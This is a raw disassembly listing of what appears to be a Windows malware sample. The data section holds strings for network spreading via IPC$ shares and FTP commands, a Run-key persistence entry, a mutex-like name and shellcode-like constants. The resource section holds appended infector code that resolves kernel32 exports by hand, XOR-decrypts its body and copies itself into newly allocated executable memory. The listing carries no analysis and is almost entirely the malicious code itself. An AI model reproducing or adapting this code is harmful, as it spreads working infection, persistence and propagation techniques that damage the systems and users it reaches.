PathName db 'c:\win2.log',0 ; DATA XREF: sub_401210+27�o
; char aI[]
aI db '%i',0 ; DATA XREF: sub_401210+16�o
align 4
; char aSC[]
aSC db '%s%c',0 ; DATA XREF: sub_401398:loc_401577�o
align 10h
; char aSIpc[]
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_401398+20�o
; sub_40159E+23�o
align 4
dword_406A2C dd 6EB06EBh, 0 dword_406A34 dd 1CEC8166h dword_406A38 dd 0E4FF07h dword_406A3C dd 302E35h dword_406A40 dd 312E35h aQuit db 'QUIT',0 ; DATA XREF: StartAddress+2DA�o
align 4
aRetr db 'RETR',0 ; DATA XREF: StartAddress+1A2�o
align 4
; char aI_I_I_I[]
aI_I_I_I db '%i.%i.%i.%i',0 ; DATA XREF: StartAddress+173�o
; sub_401EF0+D2�o
word_406A60 dw 2Ch ; DATA XREF: StartAddress+EE�r
align 4
aPort db 'PORT',0 ; DATA XREF: StartAddress+C6�o
align 4
aPass db 'PASS',0 ; DATA XREF: StartAddress+95�o
align 4
aUser db 'USER',0 ; DATA XREF: StartAddress+64�o
align 4
asc_406A7C: ; DATA XREF: sub_401EF0+102�o
unicode 0, < >,0
aJumpallsnlstil db 'JumpallsNlsTillt',0 ; DATA XREF: sub_402029+50�o
align 4
; char Name[]
Name db 'Jobaka3',0 ; DATA XREF: sub_402029+F�o
; char SubKey[]
SubKey db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
; DATA XREF: sub_4020D7+8C�o
align 4
asc_406ACC: ; DATA XREF: sub_4020D7+4B�o
unicode 0, <\>,0
off_406AD0 dd offset sub_402AFF ; DATA XREF: sub_402934+1C�r
dword_406AD4 dd 2 ; sub_4035C9+46�r
align 10h
off_406AE0 dd offset word_406AEA ; DATA XREF: sub_402810+1E�r
; sub_402A4C+12�r ...
dd offset word_406AEA
db 2 dup(0)
word_406AEA dw 20h ; DATA XREF: sub_403876+18�r
; .text:off_406AE0�o ...
unicode 0, < ((((( H>
dd 7 dup(100010h), 840010h, 4 dup(840084h), 100084h, 3 dup(100010h)
dd 3 dup(810081h), 0Ah dup(10001h), 3 dup(100010h), 3 dup(820082h)
dd 0Ah dup(20002h), 2 dup(100010h), 20h, 40h dup(0)
dword_406CEC dd 1 dd 2Eh, 1
dword_406CF8 dd 0C0000005h ; sub_402D04+11�o
dd 0Bh, 0
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
db 8Dh, 0
dw 0C000h
dd 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
db 90h
db 2 dup(0), 0C0h
dd 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_406D70 dd 3 dword_406D74 dd 7 dword_406D78 dd 0Ah dword_406D7C dd 8Ch ; sub_402BC3+8F�w ...
dd 0FFFFFFFFh, 0A00h, 10h
dword_406D8C dd 19930520h, 4 dup(0) ; sub_403496+2�o
dword_406DA0 dd 2 ; sub_4035C9+28�r
off_406DA4 dd offset aR6002FloatingP ; DATA XREF: sub_4035C9+FC�r
; sub_4035C9+12D�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 40536Ch, 9, 405340h, 0Ah, 40531Ch, 10h, 4052F0h
dd 11h, 4052C0h, 12h, 40529Ch, 13h, 405270h, 18h, 405238h
dd 19h, 405210h, 1Ah, 4051D8h, 1Bh, 4051A0h, 1Ch, 405178h
dd 78h, 405168h, 79h, 405158h, 7Ah, 405148h, 0FCh, 405144h
dd 0FFh, 405134h
byte_406E30 db 1 ; DATA XREF: sub_4035C9:loc_4035E4�o
; sub_4038A7+E1�r
db 2, 4, 8
align 8
dword_406E38 dd 3A4h dword_406E3C dd 82798260h, 21h, 0dword_406E48 dd 0DFA6h align 10h
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dword_406F28 dd 3F8h ; sub_403CF4+5�r
align 10h
dword_406F30 dd 62CF1AD5h ; sub_401000+10�w ...
dword_406F34 dd 0 ; sub_401210+D�r
; char byte_406F38[]
byte_406F38 db 4 dup(0) ; DATA XREF: sub_40127D+89�o
; sub_401398+C�o ...
dword_406F3C dd 0 ; sub_402680+91�w
dword_406F40 dd 0 ; sub_402D9F:loc_402DB1�r ...
align 8
dword_406F48 dd 0 dd 3 dup(0)
dword_406F58 dd 0A28h dword_406F5C dd 501h dword_406F60 dd 5 dword_406F64 dd 1 dword_406F68 dd 1 dword_406F6C dd 910AD0h dd 0
dword_406F74 dd 910A50h dd 3 dup(0)
off_406F84 dd offset Filename ; DATA XREF: sub_402E58+2E�w
; "C:\\Documents and Settings\\Vernier Image"...
dd 0
byte_406F8C db 0 ; DATA XREF: sub_402B10+2D�w
align 10h
dword_406F90 dd 0 dword_406F94 dd 0 ; sub_402B10+8B�w
dword_406F98 dd 0 ; sub_402BC3+46�w ...
; char Filename[]
Filename db 'C:\Documents and Settings\Vernier Image User\Desktop\07177edf8261'
; DATA XREF: sub_402E58:loc_402E6F�o
; .text:off_406F84�o
db 'd28c6a003e583fcbe38c__.exe',0
dd 21h dup(0)
dword_40707C dd 9 dup(0) ; .text:00406638�o ...
dword_4070A0 dd 1 ; sub_4030A5+23�w ...
dword_4070A4 dd 0 dword_4070A8 dd 1 ; sub_40371C:loc_403786�w
dword_4070AC dd 1 ; sub_403A40+4�w ...
dword_4070B0 dd 0 ; sub_404573+2E�w ...
dword_4070B4 dd 0 ; resolved to->USER32.GetActiveWindow ; sub_404573:loc_4045C2�r
dword_4070B8 dd 0 ; resolved to->USER32.GetLastActivePopup ; sub_404573+60�r
dd 2 dup(0)
dword_4070C4 dd 0 dd 3 dup(0)
dword_4070D4 dd 0 ; sub_403A40+3A�r ...
dd 0
dword_4070DC dd 1 ; sub_4046FE+4C�w ...
dword_4070E0 dd 0 dword_4070E4 dd 0 dword_4070E8 dd 10h ; sub_4043C7+5�r ...
dword_4070EC dd 0 ; sub_403D93+259�r ...
dword_4070F0 dd 330650h ; sub_403D93+310�w ...
dword_4070F4 dd 0 ; sub_403D93+22C�r ...
dword_4070F8 dd 1 ; sub_403D68�r ...
; LPVOID lpMem
lpMem dd 330650h ; DATA XREF: sub_403D2A+15�w
; sub_403D68+8�r ...
; UINT CodePage
CodePage dd 4E4h ; DATA XREF: sub_4038A7+14�r
; sub_4038A7+65�w ...
align 10h
dword_407110 dd 3 dup(0) ; sub_4038A7+171�o ...
dword_40711C dd 0 ; sub_4038A7+15D�w ...
byte_407120 db 0 ; DATA XREF: sub_403AE6:loc_403BF2�w
; sub_403AE6:loc_403C0F�w ...
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
dd 43424100h, 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h
dd 57565554h, 5A5958h, 0
dd 83000000h, 0
dd 9A0000h, 9E009Ch, 2 dup(0)
dd 8A0000h, 0FF8E008Ch, 2 dup(0)
dd 0AA0000h, 2 dup(0)
dd 0B500h, 0BA0000h, 0
dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
dd 0F6F5F4h, 0FBFAF9F8h, 0DFFEFDFCh, 0C3C2C1C0h, 0C7C6C5C4h
dd 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h, 0D6D5D4h, 0DBDAD9D8h
dd 9FDEDDDCh
byte_407220 db 0 ; DATA XREF: sub_4038A7+5C�o
; sub_4038A7:loc_403956�o ...
byte_407221 db 0 ; DATA XREF: sub_402EF1+3F�r
; sub_402EF1+84�r ...
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 2 dup(0)
dd 20h, 10000000h, 10001000h, 2 dup(0)
dd 20000000h, 20002000h, 10h, 0
dd 20000000h, 2 dup(0)
dd 200000h, 20000000h, 0
dd 10101000h, 5 dup(10101010h), 10101000h, 10101010h, 6 dup(20202020h)
dd 20202000h, 20202020h, 20h
; LCID Locale
Locale dd 0 ; DATA XREF: sub_4038A7+6E�w
; sub_4038A7+12B�w ...
; HANDLE hHeap
hHeap dd 330000h ; DATA XREF: sub_403382+19�w
; sub_403382+29�r ...
dd 5 dup(0)
dword_407340 dd 910EF0h ; sub_4031D7+45�r ...
dword_407344 dd 3Fh dup(0) ; HGLOBAL hResData
hResData dd 20h ; DATA XREF: sub_4031D7+26�w
; sub_4031D7:loc_403261�r ...
dword_407444 dd 1 dword_407448 dd 1 dword_40744C dd 0 dword_407450 dd 0 ; sub_402B10+57�r
dword_407454 dd 0 dword_407458 dd 1423F0h ; sub_402D47+F�r ...
dd 69h dup(0)
dd 680h dup(?)
_text ends
; Section 2. (virtual address 00009000)
; Virtual size : 00019000 ( 102400.)
; Section size in file : 00018200 ( 98816.)
; Offset to raw data for section: 00006A00
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_rsrc segment para public 'CODE' use32
assume cs:_rsrc
;org 409000h
assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
dd 4 dup(0)
dd 7C801D77h, 7C80AC28h, 7C809A81h, 7C809B14h, 0
dd 9010h, 0
dd 0FFFFFFFFh, 904Ch, 9010h, 5 dup(0)
dd 6E72656Bh, 32336C65h, 6C6C642Eh, 4C000000h, 4C64616Fh
dd 61726269h, 417972h, 47000000h, 72507465h, 6441636Fh
dd 73657264h, 73h, 72695600h, 6C617574h, 6F6C6C41h, 63h
dd 72695600h, 6C617574h, 65657246h, 0A2330000h, 0E80E30B5h
dd 0FCF83644h, 0F4476A36h, 9E7F9BDCh, 13B5857Ch, 0EF54DD1Ch
dd 0A18418CFh, 0CA90E8A8h, 3E8CE63Fh, 0A88320ACh, 50000802h
dd 8B600000h, 8B242474h, 247Ch, 245C8B28h, 1B8BFC2Ch, 0DB85C933h
dd 80B21074h, 0DF030000h, 0E803B1A4h, 66h, 0FB3BF673h
dd 7C73h, 33575553h, 0ED3343DBh, 7C8DC38Bh, 0EB8B001Dh
dd 0DF8B0800h, 0F11C49E8h, 3D5C8Dh, 800C703h, 3AE8EF8Bh
dd 5D5FE20Eh, 73C12B5Bh, 8B090000h, 34E8C5h, 1CEB0000h
dd 0AC08E0C1h, 0E840h, 28h, 13DE88Bh, 83000040h, 813DFFD9h
dd 7076000h, 2BF78B56h, 5EA4F3F0h, 4141h, 0D20295EBh, 168A0575h
dd 0C3D21246h, 0E841C933h, 0FFEE0000h, 0C913FFFFh, 0FFFFE7E8h
dd 0C3F272FFh, 107C2Bh, 7C892824h, 0C2611C24h, 0B4480010h
dd 40003085h, 563E03h, 90100060h, 90140000h, 7DF80000h
dd 77F40000h, 7FFDEBF8h, 6600h, 0B8h, 80305488h, 400001Dh
dd 9A330000h, 0F8904000h, 56630000h, 0F2A0000h, 40010000h
dd 501C02h, 4CAB00h, 6109B800h, 3100F61h, 6430056h, 1004h
dd 3CA5h, 80000h, 880105h, 51530000h, 55565752h, 1DE84000h
dd 30ED815Dh, 8D100011h, 25B5h, 8B100011h, 0C083FC46h
dd 8BF02B04h, 468B0856h, 31C0041h, 89088BC2h, 17128F8Dh
dd 0C418520h, 14240C93h, 0C970C06h, 0C100028h, 8BDE0C9Bh
dd 0F6854473h, 0E74h, 2BB9h, 8BF20300h, 0FA03407Bh, 0F38BA4F3h
dd 8D8D0000h, 1000129Fh, 226E851h, 4E8B0000h, 808B2Ch
dd 56032456h, 68406A08h, 6A5197h, 12FF0000h, 128B8589h
dd 0E8561000h, 3D7h, 2041E856h, 0CB0504DFh, 20620502h
dd 85343280h, 89840FC9h, 4E54h, 0E8565108h, 53Eh, 7B74C085h
dd 176F958Bh, 10000000h, 17738D8Bh, 0C9851000h, 8D8D0875h
dd 1367h, 2DEB1000h, 0C1F7h, 1E748000h, 0FFE18152h, 0FFFF0000h
dd 858D517Fh, 10001323h, 3C858D50h, 4000018h, 95FF5010h
dd 8B1D257Dh, 0C8030846h, 414100F8h, 858D5152h, 2B012D1h
dd 8D106A1Eh, 6A15BB85h, 0FF000800h, 1177995h, 13C395FFh
dd 401000h, 800068h, 0FF006A00h, 468BB8B5h, 8B280000h
dd 0C703087Eh, 468B10FFh, 5DC7030Ch, 97C5F5Eh, 0C35B595Ah
dd 205Eh, 100013A2h, 100013BBh, 1088142h, 6D100013h, 56100013h
dd 451B0000h, 7972746Eh, 696F5020h, 4E20746Eh, 746Fh, 756F4620h
dd 5400646Eh, 70206568h, 65636F72h, 7564030Ch, 65206572h
dd 7023h, 20732523h, 6C756F63h, 6F6E2064h, 65622074h, 6C200000h
dd 7461636Fh, 69206465h, 6874206Eh, 2065h, 616E7964h, 2063696Dh
dd 6B6E696Ch, 62696C20h, 617200C0h, 25207972h, 6F512E73h
dd 1DD6472h, 6C616E69h, 1642520h, 615B4300h, 5D796Eh, 1000138Ch
dd 0BD638098h, 65737500h, 33720000h, 6C642E32h, 654D006Ch
dd 67617373h, 4265h, 41786Fh, 72707377h, 66746E69h, 656B0041h
dd 6E720B00h, 45226C65h, 50746978h, 73DD8056h, 0CAF0073h
db 0, 49h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
push ebp
push ebx
push edi
push esi
add [eax-147EA45Bh], al
setalc
adc eax, [eax]
adc [ebx+0E8B0875h], cl ; CODE XREF: .rsrc:0040946D�j
add eax, [eax-0AE34F8h]
xchg eax, ebx
xchg eax, ebp
test eax, eax
jz short loc_409471
mov [eax], esp
add [ebp-4], eax
mov edx, [esi+4] ; CODE XREF: .rsrc:00409441�j
add edx, ebx
jle short near ptr loc_40943C+2
mov eax, [edx] ; CODE XREF: .rsrc:00409462�j
test [edx], eax
add al, al
jz short loc_409465
push edx
mov eax, [edx]
add eax, ebx
push eax
push dword ptr [ebp-4]
call dword ptr [ebx-7A51E000h]
sal byte ptr [esp+edx-55h], 5Ah
add edx, 4
jmp short near ptr loc_409443+1
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_409465: ; CODE XREF: .rsrc:00409449�j
add [ebx+68B0CC6h], al
test eax, eax
jnz short near ptr loc_409425+5
xor eax, eax
loc_409471: ; CODE XREF: .rsrc:00409435�j
jmp short near ptr dword_409478
; ---------------------------------------------------------------------------
db 0B8h
dd 56FFFFh
dword_409478 dd 5F5EFFFFh, 0C2C95D5Bh, 6E000004h, 8B087D8Bh, 5F8B0447h
; CODE XREF: .rsrc:loc_409471�j
dd 74C33B08h, 8B44h, 0F6853877h, 0F3033D74h, 0D82BD38Bh
dd 0ADFC5D89h, 0D88B0000h, 85ADDA03h, 8B2A74C0h, 8E983C8h
dd 0C985h, 0AD66ED74h, 0E781F88Bh, 0FFFh, 0C166FB03h, 0CE80000h
dd 3F88366h, 458B0575h, 490701FCh, 15887549h, 62CCEBE1h
dd 555F0600h, 0D2085D8Bh, 0A9ED815Dh, 8890014h, 3C4E8B10h
dd 8004AADBh, 83085667h, 0B70F48C3h, 18A90C43h, 1075E4C1h
dd 6F75D0A9h, 0FFA94601h, 7EEB6875h, 338B51h, 53085418h
dd 0EB8BC933h, 0E5BB70Fh, 0CF3B0000h, 68B4D7Dh, 1275FF3Ch
dd 7425FC80h, 8005h, 87515FCh, 8306C683h, 0E4EB06C1h, 0E74E83Ch
dd 0E93C0000h, 468B2975h, 0F8385701h, 8EB1875h, 8B57h
dd 0D8380146h, 0C1660E75h, 0C0C108E8h, 2BC48610h, 89C10000h
dd 835F0146h, 0C18305C6h, 46B3EB05h, 0EB41h, 0EB595BAFh
dd 8B575118h, 0FFA033Bh, 830E4BB7h, 2EC0000h, 57525166h
dd 16E8h, 83595F00h, 5610C3h, 0E9057449h, 0FFFFFF5Ch, 0D400045Dh
dd 8758B60h, 104D8B66h, 20C558Bh, 3071980h, 88966C2h, 0C961F4EBh
dd 1E2B0CC2h, 800800E6h, 100015FFh, 1591858Dh, 0D0C2D21Bh
dd 0A78B0889h, 48896105h, 22CC1604h, 16011649h, 2000A90Ch
dd 0E9407525h, 0A4h, 3F28B51h, 8B331980h, 84B84BDh, 0F9C1C18Bh
dd 0F3020014h, 83C803A5h, 0A4F303E1h, 9B60FC8Bh, 47B03FAh
dd 591B00F7h, 8B5D69EBh, 4087Dh, 163403h, 0F78B5110h, 8B30772Bh
dd 0C600A8FEh, 0C703574Ah, 10015256h, 0A68D8D5Ch, 84B8B51h
dd 8D8D89h, 5105B60Ch, 0D0FF5657h, 50A18B5Ah, 0E6E63C8h
dd 5F5E6678h, 4ED7B1EBh, 0B2383A38h, 16B70DC8h, 740D1500h
dd 0E083F259h, 5007402h, 738B514Ah, 4B8B8604h, 74000308h
dd 7B8B62F2h, 8BFA0304h, 84B02C3h, 0AAF3C033h, 1D083B82h
dd 17002610h, 7FADE285h, 0C758B56h, 5D8B0002h, 39C03308h
dd 4751046h, 2C740639h, 741C3000h, 8430303h, 30C4E8Bh
dd 84Bh, 85107E8Bh, 30374FFh, 5750087Bh, 19E85351h, 0
dd 0FFF88300h, 0C6830774h, 33C9EB14h, 22505EC0h, 0A6C2C9h
dd 5340A315h, 0AF193855h, 0C459986h, 83892704h, 89C033A2h
dd 0A4E66083h, 75FFB88Bh, 11FF0Ch, 0FC4589D2h, 7F74C085h
dd 10758Bh, 14557280h, 275D285h, 0F685D68Bh, 0F28B0275h
dd 0CA43E00Ch, 0C7100017h, 10384331h, 0B85249DEh, 0E1A94941h
dd 13808B0Ah, 0E2E28112h, 5D8B0BEBh, 1808B08h, 8530312h
dd 3E02C283h, 18092D58h, 10001311h, 900752h, 0C0855400h
dd 895A1174h, 83028906h, 0C68304C2h, 0EB0400B6h, 0EBC0339Bh
dd 63F5A06h, 0C95B5D05h, 0EF0063C2h, 748B6000h, 7C8B2424h
dd 5C8B2824h, 8BFC2C24h, 74DB851Bh, 3D2334Eh, 0FB3BA4DFh
dd 20E84573h, 73000000h, 27E8F4h, 0E8910000h, 21h, 41414848h
dd 0AC08E0C1h, 0F78B5640h, 0A4F3F02Bh, 66D7EB5Eh, 875D203h
dd 92AD6692h, 42D20366h, 40C033C3h, 0FFFFEAE8h, 0E8C013FFh
dd 0FFFFFFE3h, 2BC3F272h, 8928247Ch, 611C247Ch, 0C50010C2h
dd 5B000090h, 44000009h, 85000001h, 18000097h, 1C000090h
dd 90h, 0B8004000h, 0F04087B0h, 1082888Dh, 41891000h, 24548B01h
dd 0C528B04h, 83E902C6h, 0CA2B05C2h, 33FC4A89h, 0B0B8C3C0h
dd 64F04087h, 58Fh, 0C4830000h, 51535504h, 8D565257h, 104398h
dd 18538B10h, 406AE88Bh, 100068h, 473FF00h, 4B8B006Ah
dd 8BCA0310h, 8BD0FF01h, 338B50F8h, 318538Bh, 0C4B8BF2h
dd 858DCA03h, 1000111Dh, 8F0473FFh, 50006A00h, 0D1FF5657h
dd 8430358h, 538BF88Bh, 8BF08B18h, 0C083FC46h, 89F02B04h
dd 4B8B0856h, 244E8910h, 51144B8Bh, 0FF284E89h, 218589D7h
dd 8B100011h, 4B0359F0h, 80006818h, 6A0000h, 8B11FF57h
dd 5F5A5EC6h, 0FF5D5B59h, 95BE0h, 40283E00h, 4Bh dup(0)
db 90h
; ---------------------------------------------------------------------------
call $+5
mov eax, [esp]
test dword ptr [eax+242Bh], 80000000h
mov [eax+29ACh], ebx
mov ebx, [esp+4]
jz short loc_409A4C
cld
pop ecx
mov [eax+29B0h], esi
mov [eax+29B4h], edi
cmp byte ptr [eax+242Fh], 0E8h
jnz short loc_409A43
add ebx, [eax+2430h]
mov ebx, [ebx+2]
push dword ptr [ebx]
jmp short loc_409A4B
; ---------------------------------------------------------------------------
loc_409A43: ; CODE XREF: .rsrc:00409A34�j
mov ebx, [eax+2431h]
push dword ptr [ebx]
loc_409A4B: ; CODE XREF: .rsrc:00409A41�j
pop ebx
loc_409A4C: ; CODE XREF: .rsrc:00409A1D�j
push ebp
xchg eax, ebp
sub dword ptr [esp+4], 71C8h
and ebx, 0FFFFF000h
sub ebp, 401006h
mov edi, [esp+4]
lea esi, [ebp+40343Ch]
mov ecx, 45h
rep movsb
loc_409A73: ; CODE XREF: .rsrc:00409A8F�j
cmp dword ptr [ebx+4Eh], 73696854h
jnz short loc_409A89
mov eax, [ebx+3Ch]
lea eax, [eax+ebx]
cmp word ptr [eax], 4550h
jz short loc_409A91
loc_409A89: ; CODE XREF: .rsrc:00409A7A�j
sub ebx, 100h
jnz short loc_409A73
loc_409A91: ; CODE XREF: .rsrc:00409A87�j
mov edx, [eax+78h]
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_409A9F: ; CODE XREF: .rsrc:loc_409AC6�j
lodsd
add eax, ebx
cmp dword ptr [eax-1], 74654700h
jnz short loc_409AC6
cmp dword ptr [eax+3], 636F7250h
jnz short loc_409AC6
cmp dword ptr [eax+7], 72646441h
jnz short loc_409AC6
cmp dword ptr [eax+0Bh], 737365h
jz short loc_409ACB
loc_409AC6: ; CODE XREF: .rsrc:00409AA9�j
; .rsrc:00409AB2�j ...
loop loc_409A9F
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_409ACB: ; CODE XREF: .rsrc:00409AC4�j
sub [esp], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
call near ptr loc_409AF1+2
inc ebx
insb
outsd
jnb short near ptr loc_409B4F+2
dec eax
popa
outsb
db 64h
insb
loc_409AF1: ; CODE XREF: .rsrc:00409AE2�p
add gs:[ebx-1], dl
setalc
mov [ebp+40353Ch], eax
call near ptr loc_409B0D+1
inc ebx
jb short near ptr loc_409B68+1
popa
jz short near ptr loc_409B68+4
inc ebp
jbe short near ptr loc_409B6E+1
outsb
jz short near ptr loc_409B4C+2
loc_409B0D: ; CODE XREF: .rsrc:00409AFC�p
add [ebx-1], dl
setalc
mov [ebp+403540h], eax
call sub_409B29
inc edi
db 65h
jz short near ptr loc_409B68+4
popa
jnb short loc_409B97
inc ebp
jb short near ptr loc_409B97+1
outsd
jb short $+2
; =============== S U B R O U T I N E =======================================
sub_409B29 proc near ; CODE XREF: .rsrc:00409B17�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00409BD2 SIZE 000000B1 BYTES
; FUNCTION CHUNK AT 00409D12 SIZE 0000013A BYTES
push ebx
call esi
mov [ebp+403544h], eax
call sub_409BA7
test eax, eax
jz short loc_409B5C
push eax
call dword ptr [ebp+403544h]
test eax, eax
jnz short loc_409B56
lea eax, loc_4011D2[ebp]
loc_409B4C: ; CODE XREF: .rsrc:00409B0B�j
mov dl, [eax-1]
loc_409B4F: ; CODE XREF: .rsrc:00409AEA�j
call sub_409BC2
jmp short loc_409BD2
; ---------------------------------------------------------------------------
loc_409B56: ; CODE XREF: sub_409B29+1B�j
; sub_409B29+136�j ...
call dword ptr [ebp+40353Ch]
loc_409B5C: ; CODE XREF: sub_409B29+10�j
test dword ptr [ebp+403431h], 80000000h
jz short loc_409B86
loc_409B68: ; CODE XREF: .rsrc:00409B02�j
; .rsrc:00409B05�j ...
lea esi, [ebp+403435h]
loc_409B6E: ; CODE XREF: .rsrc:00409B08�j
mov edi, [esp+8+var_4]
movsb
movsd
mov ebx, [ebp+4039B2h]
mov esi, [ebp+4039B6h]
mov edi, dword ptr ss:loc_4039BA[ebp]
loc_409B86: ; CODE XREF: sub_409B29+3D�j
pop ebp
retn
sub_409B29 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_409B88: ; CODE XREF: sub_409BA7+2�p
; sub_409B29:loc_409D91�p
pop edx
push 0
push 0
push 0
push 0
push 40001h
; ---------------------------------------------------------------------------
db 8Bh
; ---------------------------------------------------------------------------
loc_409B97: ; CODE XREF: .rsrc:00409B21�j
; .rsrc:00409B24�j
les ebp, [edx+0]
push eax
push 0Ch
mov eax, esp
jmp edx
; ---------------------------------------------------------------------------
aVt_3 db 'VT_3',0
db 0
; =============== S U B R O U T I N E =======================================
sub_409BA7 proc near ; CODE XREF: sub_409B29+9�p
; .rsrc:loc_40A84C�p
xor ecx, ecx
call loc_409B88
lea edx, loc_4011A1[ebp]
push edx
push ecx
push ecx
push eax
call dword ptr [ebp+403540h]
add esp, 20h
retn
sub_409BA7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_409BC2 proc near ; CODE XREF: sub_409B29:loc_409B4F�p
; sub_40B996+25B�p
mov dh, dl
mov ecx, 225Fh
loc_409BC9: ; CODE XREF: sub_409BC2+C�j
xor [eax], dl
inc eax
add dl, dh
loop loc_409BC9
retn
sub_409BC2 endp
; ---------------------------------------------------------------------------
db 0E6h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_409B29
loc_409BD2: ; CODE XREF: sub_409B29+2B�j
and dword ptr [ebp+401580h], 0
and dword ptr [ebp+401584h], 0
and dword ptr ss:loc_401588[ebp], 0
mov eax, [ebp+403431h]
xor ecx, ecx
push 1
mov cl, 20h
pop dword ptr ss:loc_40397E[ebp]
loc_409BF9: ; CODE XREF: sub_409B29+E0�j
xor edx, edx
shr eax, 1
setb dl
shl dl, 3
add dword ptr ss:loc_40397E[ebp], edx
loop loc_409BF9
push edi
mov byte ptr [ebp+401303h], 1
mov dword ptr ss:loc_403548[ebp], esi
lea esi, loc_4015BB[ebp]
xor ecx, ecx
lea edi, loc_403558[ebp]
mov cl, 1Eh
call sub_409F8C
pop edi
call dword ptr [ebp+403594h]
shr eax, 1Fh
jz loc_409D12
mov eax, [edi+14h]
push 40h
add eax, ebx
push 8001000h
mov [ebp+403550h], eax
push 69CEh
push 0
call dword ptr ss:locret_4035C8[ebp]
test eax, eax
jz loc_409B56
xchg eax, edi
lea esi, sub_401000[ebp]
mov ebp, edi
mov ecx, 0A74h
sub ebp, offset sub_401000
lea edx, [ebp+401283h]
rep movsd
jmp edx
; END OF FUNCTION CHUNK FOR sub_409B29
; ---------------------------------------------------------------------------
sub esp, 20h
mov edi, esp
push 8
xor eax, eax
pop ecx
lea edx, loc_401A3D[ebp]
rep stosd
mov edi, esp
mov [edi+10h], edx
inc byte ptr [edi+1Ch]
push edi
push 10003h
call dword ptr [ebp+403550h]
add esp, 20h
test eax, eax
jz loc_409B56
xchg eax, edi
push 0
push 1
push 80000400h
push 10000h
call dword ptr [ebp+403550h]
test eax, eax
jz loc_409B56
push 0
push eax
push 40000h
push 0
shr eax, 0Ch
push edi
push 1
push eax
push 10001h
call dword ptr [ebp+403550h]
push 1000Ah
call dword ptr [ebp+403550h]
call sub_409D02
jmp loc_409B56
; =============== S U B R O U T I N E =======================================
sub_409D02 proc near ; CODE XREF: .rsrc:00409CF8�p
; sub_409D02+D�j
push 1
pop ecx
jecxz short locret_409D11
push 0Ah
call dword ptr [ebp+4035BCh]
jmp short sub_409D02
; ---------------------------------------------------------------------------
locret_409D11: ; CODE XREF: sub_409D02+3�j
retn
sub_409D02 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_409B29
loc_409D12: ; CODE XREF: sub_409B29+10F�j
cmp dword ptr ss:loc_403570[ebp], 0
jz loc_409B56
call near ptr loc_409D29+1
dec esi
push esp
inc esp
dec esp
dec esp
loc_409D29: ; CODE XREF: sub_409B29+1F6�p
add bh, bh
xchg eax, ebp
mov ds:0B58D0040h, dh
jnb short near ptr loc_409D46+5
inc eax
add [ebx], dh
leave
lea edi, [ebp+4035D0h]
mov cl, 0Bh
xchg eax, ebx
call sub_409F8C
loc_409D46: ; CODE XREF: sub_409B29+209�j
cmp dword ptr [ebp+4035F8h], 0
jz loc_409B56
mov eax, [ebp+4035D4h]
push dword ptr [eax+1]
pop dword ptr [ebp+403395h]
mov eax, [ebp+4035E8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E2h]
mov eax, [ebp+4035D8h]
push dword ptr [eax+1]
pop dword ptr [ebp+4033E9h]
mov ecx, dword ptr ss:loc_4035DC[ebp]
jecxz short loc_409D91
push dword ptr [ecx+1]
pop dword ptr ss:loc_4033F6[ebp]
loc_409D91: ; CODE XREF: sub_409B29+25D�j
call loc_409B88
lea edi, [ebp+40364Eh]
mov ecx, edi
push 0
neg cl
push dword ptr [eax+4]
and ecx, 3
push 40h
add edi, ecx
push edi
push 0
push 18h
lea esi, loc_40159F[ebp]
mov ecx, 1Ch
mov edx, esp
lea eax, ds:0FFFFFFFEh[ecx*2]
stosw
lea eax, ds:0[ecx*2]
stosw
lea eax, [edi+4]
stosd
xor ah, ah
loc_409DD6: ; CODE XREF: sub_409B29+2B0�j
lodsb
stosw
loop loc_409DD6
push 0
push 69CEh
mov ecx, esp
push 0
mov eax, esp
push 0
push 8000000h
push 40h
push ecx
push edx
push 0Eh
push eax
call dword ptr ss:loc_4035E0[ebp]
pop eax
add esp, 40h
push 69CEh
mov edx, esp
push 0
mov ecx, esp
push 40h
push 0
push 2
push edx
push 0
push 69CEh
push 0
push ecx
push 0FFFFFFFFh
push eax
call dword ptr ss:loc_4035E4[ebp]
pop edi
pop ecx
test edi, edi
jz loc_409B56
